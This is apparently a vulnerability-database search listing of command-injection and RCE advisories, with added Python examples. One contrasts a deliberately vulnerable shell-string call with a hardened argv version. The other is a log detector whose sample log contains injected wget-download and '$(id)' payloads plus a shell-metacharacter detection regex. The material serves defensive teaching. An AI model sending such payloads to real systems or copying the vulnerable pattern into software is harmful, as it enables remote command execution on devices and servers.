
1227 matches found

CNNVD
added 2021/07/08 12:00 a.m., 4 views

Aruba ClearPass Policy Manager command injection vulnerability

Aruba ClearPass Policy Manager is an application from Aruba, Inc. that provides a wireless network security access management system. Aruba ClearPass Policy Manager suffers from a command injection vulnerability that originates from the product not performing security checks on user-supplied input, which...

CVSS 6.5 | AI score 5.9 | EPSS 0.01246
Exploits 0 | References 1
Huntr
added 2021/05/29 4:59 p.m., 9 views

OS Command Injection in falconchristmas/fpp

Description: Hi, it is possible to inject arbitrary OS commands in https://github.com/FalconChristmas/fpp/blob/59b7f7e8039a7019143c2c4b44f7d95b6358a4ef/www/formatstorage.php#L24 php &1"; echo "Command: $command\n"; echo...

AI score 1.6
Exploits 0
CNNVD
added 2021/05/27 12:00 a.m., 4 views

SonicWall NSM On-Prem operating system command injection vulnerability

SonicWall NSM On-Prem is an application from SonicWall USA, Inc. It provides unlimited scalability to support thousands of SonicWall security appliances under its management. SonicWall NSM On-Prem suffers from an operating system command injection vulnerability that can be exploited by an attacke...

CVSS 9 | AI score 5.8 | EPSS 0.11642
Exploits 1 | References 2
NVD
added 2021/05/24 11:15 a.m., 15 views

CVE-2021-24307

The All in One SEO – Best WordPress SEO Plugin – Easily Improve Your SEO Rankings before 4.1.0.2 enables authenticated users with the "aioseotoolssettings" privilege (most of the time admin) to execute arbitrary code on the underlying host. Users can restore the plugin's configuration by uploading a backup...

CVSS 9 | EPSS 0.53274
Exploits 3 | References 2
Prion
added 2021/05/24 11:15 a.m., 24 views

Design/Logic Flaw

The All in One SEO – Best WordPress SEO Plugin – Easily Improve Your SEO Rankings before 4.1.0.2 enables authenticated users with the "aioseotoolssettings" privilege (most of the time admin) to execute arbitrary code on the underlying host. Users can restore the plugin's configuration by uploading a backup...

CVSS 9 | AI score 8.9 | EPSS 0.53274
Exploits 3 | References 2 | Affected Software 1
Huntr
added 2021/05/12 2:33 p.m., 10 views

OS Command Injection in falconchristmas/fpp

Description: In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/runEventScript.php#L32 a command is built using unsanitized user input: php \n"; echo "\n"; system($SUDO . " $fppDir/scripts/eventScript $scriptDirectory/$script $args"); // scripts and args ar...

AI score 0.3
Exploits 0
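The two fpp reports above describe the same shape of bug: a shell command string assembled from request parameters and handed to system(), so a ';' or '$(...)' in a parameter is parsed as shell syntax. The following is an added example written for this page, not fpp's code. It reproduces that pattern in Python with `echo` standing in for the event script and an assumed script directory, then shows the argv-list form with a script-name check that closes the hole.

```python
# Added example, not fpp project code. "echo" is a hypothetical stand-in for
# $fppDir/scripts/eventScript: it prints its argv, so the output shows exactly
# what the real script would have received. SCRIPT_DIR is an assumed value.
import re
import shlex
import subprocess

SCRIPT_DIR = "/opt/fpp/scripts"
SAFE_SCRIPT_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def build_shell_string(script: str, args: str) -> str:
    """The vulnerable shape: untrusted values interpolated into one shell string."""
    return f"echo eventScript {SCRIPT_DIR}/{script} {args}"


def run_vulnerable(script: str, args: str) -> str:
    # shell=True hands the whole string to /bin/sh, so ';', '|', '`' and
    # '$(...)' inside either parameter are executed rather than passed as data.
    cmd = build_shell_string(script, args)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def build_argv(script: str, args: str) -> list[str]:
    """Hardened shape: validate the script name, pass everything as a literal argv."""
    # Reject path separators, shell characters and the '.'/'..' names the
    # character class would otherwise accept.
    if not SAFE_SCRIPT_NAME.fullmatch(script) or script in (".", ".."):
        raise ValueError(f"rejected script name: {script!r}")
    # shlex.split only tokenises on whitespace and quotes; no shell ever
    # re-parses the result, so metacharacters stay inside their argument.
    return ["echo", "eventScript", f"{SCRIPT_DIR}/{script}", *shlex.split(args)]


def run_hardened(script: str, args: str) -> str:
    return subprocess.run(build_argv(script, args), capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "on; echo $((6*7))"  # constructed injection payload sent as the args parameter
    print(run_vulnerable("lights.sh", payload))  # a second command runs: 42 appears on its own line
    print(run_hardened("lights.sh", payload))    # the payload stays a literal argument
    try:
        build_argv("../../etc/passwd", "")
    except ValueError as exc:
        print(exc)
```

The name check matters as much as the argv list: without it, a traversal name still selects an arbitrary file under the directory prefix even though no shell is involved.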
wpexploit
added 2021/05/09 12:00 a.m., 1277 views

All in One SEO Pack < 4.1.0.2 - Admin RCE via unserialize

The plugin enables authenticated users with the "aioseotoolssettings" privilege (most of the time admin) to execute arbitrary code on the underlying host. Users can restore the plugin's configuration by uploading a backup .ini file in the section "Tool Import/Export". However, the plugin attempts to...

CVSS 9 | AI score 0.3 | EPSS 0.53274
Exploits 3 | References 1
Metasploit
added 2021/05/04 5:41 p.m., 85 views

GravCMS Remote Command Execution

This module exploits an arbitrary config write/update vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user. Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify...

CVSS 9.8 | AI score 9.4 | EPSS 0.80467
Exploits 12
0day.today
added 2021/05/04 12:00 a.m., 79 views

GravCMS 1.10.7 Remote Command Execution Exploit

This Metasploit module exploits an arbitrary config write/update vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user. Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and...

CVSS 9.8 | AI score 0.3 | EPSS 0.80467
Exploits 12
CNNVD
added 2021/04/29 12:00 a.m., 7 views

China Mobile An Lianbao WF-1 router operating system command injection vulnerability

The China Mobile An Lianbao WF-1 router is a router from China Mobile (China). China Mobile An Lianbao WF-1 router 1.0.1 suffers from an operating system command injection vulnerability, which originates in the api/ZRFirmware/settimezone (set time zone) interface, that can be exploited by a remote attacker...

CVSS 9.8 | AI score 8.9 | EPSS 0.0327
Exploits 1 | References 4
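The router entry above names a single HTTP interface as the injection point, which is the kind of thing a detection engineer turns into a log check. As an added example (not part of the CNNVD entry and not the vendor's software), the detector below scans constructed web-server access-log lines for shell metacharacters in parameters sent to that path. The combined log format, the IP addresses, the parameter name `timezone` and the payloads are all assumptions; the part worth keeping is the repeated percent-decoding, which catches the double-encoded `%2524` form that a single decode misses.

```python
# Added example: detection over constructed access-log lines, not vendor code.
# Assumptions: Apache/nginx combined log format; the request line carries the
# query string (request bodies are not logged, so POST-body injection needs a
# different source); parameter name and payloads are made up for the demo.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Characters and constructs /bin/sh treats as syntax rather than data:
# command separators, pipes, backticks, newlines, $( / ${ expansion,
# and redirections to absolute paths.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{|>\s*/|<\s*/")

WATCHED_PATH = "/api/ZRFirmware/settimezone"  # path from the entry; leading slash assumed

# Constructed sample log: one benign request, one ';'-separated download
# payload, one double-encoded "$(id)", and one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Apr/2021:10:01:02 +0000] "POST /api/ZRFirmware/settimezone?timezone=Europe%2FBerlin HTTP/1.1" 200 17
10.0.0.9 - - [29/Apr/2021:10:01:07 +0000] "POST /api/ZRFirmware/settimezone?timezone=UTC%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 17
10.0.0.9 - - [29/Apr/2021:10:01:09 +0000] "POST /api/ZRFirmware/settimezone?timezone=UTC%2524%2528id%2529 HTTP/1.1" 200 17
10.0.0.5 - - [29/Apr/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 5120
"""


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2524 -> %24 -> $ is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text: str) -> list[dict]:
    """Return one alert per parameter value on the watched path that contains shell syntax."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; a real pipeline would count these
        parts = urlsplit(m["target"])
        if parts.path != WATCHED_PATH:
            continue
        # parse_qsl performs the first decode; full_decode handles further layers.
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = full_decode(raw)
            if SHELL_META.search(value):
                alerts.append({"ip": m["ip"], "ts": m["ts"], "param": name, "value": value})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Matching on the decoded value rather than the raw query string is what makes the third line fire; the same idea applies to parameters in request bodies if a WAF or application log captures them.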
Packet Storm
added 2021/04/21 12:00 a.m., 321 views

GravCMS 1.10.7 Remote Command Execution

This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule 'GravCMS Remote Command Execution', 'Description' => %q This module exploits arbitrary config write/update vulnerability to achieve remote code...

AI score 0.4 | EPSS 0.80467
Exploits 12
VulnCheck KEV
added 2021/04/13 12:00 a.m., 3 views

VulnCheck KEV: CVE-2021-27104

Accellion FTA contains an OS command injection vulnerability exploited via a crafted POST request to various admin endpoints...

CVSS 10 | AI score 7.5 | EPSS 0.56686
Exploits 0 | References 1
Cvelist
added 2021/04/07 6:20 p.m., 40 views

CVE-2021-21425 Unauthenticated Arbitrary YAML Write/Update leads to Code Execution

Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of the administrator controller without needing any credentials. Particular method execution will result in...

CVSS 9.3 | AI score 9.7 | EPSS 0.80467
Exploits 12 | References 4
Exploit DB
added 2021/03/19 12:00 a.m., 259 views

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution

Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
Date: 03.02.2021
Exploit Author: LiquidWorm
Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web pag...

AI score 7.4
Exploits 0
NVD
added 2021/03/15 7:15 p.m., 13 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website (CSRF)...

CVSS 8.8 | EPSS 0.01361
Exploits 1 | References 1
OSV
added 2021/03/15 7:15 p.m., 14 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website (CSRF)...

CVSS 8.8 | AI score 8.8 | EPSS 0.02899
Exploits 3 | References 1
Cvelist
added 2021/03/15 6:20 p.m., 13 views

CVE-2020-29553

The Scheduler in Grav CMS through 1.7.0-rc.17 allows an attacker to execute a system command by tricking an admin into visiting a malicious website (CSRF)...

AI score 8.8 | EPSS 0.01361
Exploits 1 | References 1
UbuntuCve
added 2021/03/10 8:15 a.m., 37 views

CVE-2020-13936

An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify Velocity templates running Apache...

CVSS 9 | AI score 7 | EPSS 0.22709
Exploits 0 | References 8
CVE
added 2021/03/10 8:00 a.m., 539 views

CVE-2020-13936

CVE-2020-13936 affects Apache Velocity, where modifying Velocity templates can bypass the sandbox and allow remote code execution with the container's privileges. Engine versions affected include up to 2.2; IBM and related advisories flag this as a Velocity sandbox bypass leading to arbitrary cod...

CVSS 9 | AI score 8.9 | EPSS 0.22709
Exploits 0 | References 23 | Affected Software 2
ATTACKERKB
added 2021/03/01 12:00 a.m., 44 views

CVE-2021-27878

An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to ga...

CVSS 9 | AI score 9.7 | EPSS 0.23952
In the wild | Exploits 4 | References 3